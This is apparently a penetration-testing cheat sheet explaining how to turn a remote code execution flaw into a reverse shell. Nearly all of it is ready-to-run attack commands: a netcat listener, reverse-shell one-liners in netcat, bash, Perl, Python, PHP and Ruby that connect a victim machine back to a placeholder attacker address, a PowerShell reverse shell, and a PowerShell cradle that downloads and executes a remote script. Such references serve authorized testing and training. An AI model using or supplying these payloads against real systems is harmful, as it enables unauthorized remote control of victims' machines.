If during a penetration test you discover an RCE (Remote Code Execution) vulnerability most likely what you need is to run a Reverse Shell to gain more control over the victim machine.
An RCE is a vulnerability that allows you to execute commands on the victim. And this is why if I activate a listener on my system I will be able to execute a command on the exploited machine whose purpose is to make it connect to my listener obtaining a shell.
First you need to activate a listener on your machine typically using netcat:
Netcat listener # nc -lnvp 1234 -l means "listen mode" -n prevent "DNS lookup" -v means "verbose mode" -p means "the listened port" (in this case is port 1234)
Then, when your listener is running, you can execute RCE on victim machine to connect to listener.
There are various methods for doing this. The most used methods are those based on linux systems and are the following:
netcat
nc -e /bin/sh MY_IP 1234
or
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc MY_IP 1234 >/tmp/f
or
rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc MY_IP 1234 >/tmp/f
bash
bash -i >& /dev/tcp/MY_IP/1234 0>&1
or
0<&196;exec 196<>/dev/tcp/MY_IP/1234; sh <&196 >&196 2>&196
PERL
perl -e 'use Socket;$i="MY_IP";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python
IPv4
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("MY_IP",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
or
IPv6
python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",1234,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'
PHP
php -r '$sock=fsockopen("MY_IP",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
or
php -r '$sock=fsockopen("MY_IP",1234);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
or
php -r '$sock=fsockopen("MY_IP",1234);`/bin/sh -i <&3 >&3 2>&3`;'
or
php -r '$sock=fsockopen("MY_IP",1234);system("/bin/sh -i <&3 >&3 2>&3");'
or
php -r '$sock=fsockopen("MY_IP",1234);passthru("/bin/sh -i <&3 >&3 2>&3");'
or
php -r '$sock=fsockopen("MY_IP",1234);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
Ruby
ruby -rsocket -e'f=TCPSocket.open("MY_IP",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Windows victim machine
If victim is Windows machine you can use Powershell (if this is installed) to connect to listener:
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('MY_IP',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
instead if you have a “ps1” script to do reverse shell in your machine you can run a simple web server on port 8000 using, for example, python3:
python3 -m http.server 8000
so, to connect to netcat listener, run powershell in victim to download and execute “ps1” script, as follow:
powershell "IEX(New-Object Net.WebClient).downloadString('http://MY_IP:8000/scrtipt.ps1')"